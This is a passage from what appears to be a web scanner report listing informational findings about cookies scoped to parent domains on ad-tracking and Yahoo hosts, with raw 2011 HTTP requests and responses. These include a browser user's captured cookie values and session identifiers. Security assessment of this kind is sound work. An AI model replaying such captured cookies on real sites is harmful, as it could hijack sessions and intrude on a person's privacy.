P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.16. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732015&c4=178113848&c5=1&c6=24&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&c9=&c10=&c15=&1303827681934 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_G=method->-1,ts->1303827671; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 14:21:16 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Thu, 25-Apr-2013 14:21:16 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:37 GMT
Connection: close
Content-Length: 3235

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

14.18. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Sat, 12-Nov-2011 13:54:00 GMT; path=/;
Date: Tue, 26 Apr 2011 13:53:59 GMT
Content-Length: 0


14.19. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db6076013a27c7a&callback=_ate.ad.hrr&pub=xa-4ca0241930358767&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fresources%2Fwebinars%2Fe-commerce%2Fpci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg&9vmo63 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=3; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 25 Apr 2011 23:45:19 GMT
Set-Cookie: di=1303662902.60|1303662902.1OD|1303662902.1FE; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 23:45:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25-May-2011 23:45:19 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

14.20. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextlinks.netseer.com
Path:   /dsatserving2/servlet/BannerServer

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1139&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&adh=40&adw=590 HTTP/1.1
Host: contextlinks.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fe0b24b3b7c7dd3,1303674392792,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID"
Set-Cookie: JSESSIONID=1D6BCE0733992C64CC0150683040A44D.dsat2; Path=/dsatserving2
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1017,449,www.spamlaws.com,0,0,1,imp3fe8a7f7f255a587,1303827656489,&1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303827656491,aHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWw,US-TX-623-Dallas"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:56 GMT
Content-Length: 5707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>NetSeer Advertisement</title>
       <meta http-equiv="pragma" content="no-cache
...[SNIP]...

14.21. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.com%2fbusiness-security%2fpci-compliance%2fpci-scan.php HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0e3la00837010i02408; rdrlst=40415xylk60qe00000002370113bolk7p6z0000000137010znmlk346200000003370110poljyxb4000000053701; sglst=2020s0t7ljyxb408rvv00537010i02405ag3ljyxb408rvv00537010i02405; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0etq900937020i03409; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40515xylk60qe00000003370213bolk7p6z0000000237020znmlk346200000004370210poljyxb4000000063702159olk8fby000000013701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb409i0u00637020i03406ag3ljyxb409i0u00637020i03406; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: vstcnt=417k010r024uzg6118e10024eflo118e1042; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=CEGVCKfQuwIQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Mon, 25 Apr 2011 23:45:33 GMT


14.22. http://downloads.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 13:55:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://downloads.yahoo.com/windows
Set-Cookie: ysf=GSNFLYCE5xfXhMgDKtDsvBAgEPqdul7F4R6eY0r3frTlNWE6qmXVAtv1CkLypFvQz0DrdSW5hE9nUKlwpRw4BWq3xtYsWXBLidy75rvVoghb9DOg8Qecuk_9UXbLn3roNKy1k2ur51WmNXH55svDTvUaF6O4kB1QMMFH2NPq4DtM7KukuSfJUufHt384c3O4yGuNm7F6A_cstJIc6UCpeGbpsYL3p41Ynmz331_Bayzp3EP.7BfHE5nGHLOZpni1kBacU8R1jHwVgvjTHEwXI66OoQFeRWeRPLb_DyBtt2CRzXLofek7cKueeEPU0kUY4K7tf9s8ligln_Rv3z6ZAWmCoFU1dKxsJynOHg_mm0odfwowntWbo9CDVF_RjscTDVDIwjhmDkZ1PduXX8GFN63QqFTGlyO8aLIbyr3eOGxiXB3T; expires=Thu, 26-Apr-2012 13:55:04 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 192

<html><head><meta http-equiv="refresh" content="0;url=http://downloads.yahoo.com/windows"/></head></html><!-- fe1.downloads.ne1.yahoo.com uncompressed/chunked Tue Apr 26 13:55:04 UTC 2011 -->

14.23. http://downloads.yahoo.com/freeware  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /freeware

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freeware HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=ciGdOSjH5xepaEAZS7QpAXfv98cK6F6KOcKtFsBL.zOIPQE4N3EHjPIjz9Ry0.pA_mhV2n7Jk1hw5pekH26vxKFtU5TRQQAma.hL037jgYa2PTX1V1toVMBQkwW0dgg4DfLPDcclwS0d8ZIiLUS.dMq6ZSeg6uvseIjSVaAzLU0vfSpRvMWxH3gKjA0C54a3RHQpbUeTZGL.yJk2WBR1MFBu8yCip521Ptzsm3Z3mlh3zMyVSofOpA.FJ1kwjgCkS1.NbzkgfKrwT2snB9ZepFddS4yfxXfIfiHs2KuE5RpdCYPYEjZWj4_uTK0IIeFNkv4kq82BDTkvDFePKHRvIjb9FO9fe1TrqhEzPiHz4Ap7wCfx0gOIInDXzvX_fNtQ66cXT7EGRJj4MJTsvQnxVuKHG3ztG8Lw3MufNM2i3lGi9VFA; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 141230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.24. http://downloads.yahoo.com/linux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /linux

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /linux HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.4.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=EJrvAC_B5xevrWgM3QJ9810zR4MY0ALwmL67RvYl4ACCDjj91C5QOzAKojsZVGh5deEI1hSA5VaAJUGx17h82kxoBREydbHnor1ILXmEa8wQ5wzN4VHUV6V83C2a4vsDlIosvXogdOWwmx_MnZKukNzYDLWMg3cz66FITnSnPasy1PL_qQgGs9MMdNFdMWD3boAma3XgVE4SSncKTsuYqyQkIpbMi0sZwzc3YWz07HQaL46euEfKCnnb3Vp2oCFQ5OhdtsKrJrpYOwni9u.OO4JPbknkKFpXwZGfRKqX89yug3H5GXRn_bVK1PCeOhc9M77MfjEAXiw3Y.bA7l1DQPwqaOuGRgNhxArHn7_uk._qc8vt2PpgQbMH0c51CO5tYMJBZNSpchj9e2AdYWohceMZKPxW4fzLDSBVQDqvHJZtbvVVR0TXENX_l0xFuFKDiVkkWI9_gMeWuGenxxyVzA--; expires=Thu, 26-Apr-2012 13:56:13 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 142705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...

14.25. http://downloads.yahoo.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
